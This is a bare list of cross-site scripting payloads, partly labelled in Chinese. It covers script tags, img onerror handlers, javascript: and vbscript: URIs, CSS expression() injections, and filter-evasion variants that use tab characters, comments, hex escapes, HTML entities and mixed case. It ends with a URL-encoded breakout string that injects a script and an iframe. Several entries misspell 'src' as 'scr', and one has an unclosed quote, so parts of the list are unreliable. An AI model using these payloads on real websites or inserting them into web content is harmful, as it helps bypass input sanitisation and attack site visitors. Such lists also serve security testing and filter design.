<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["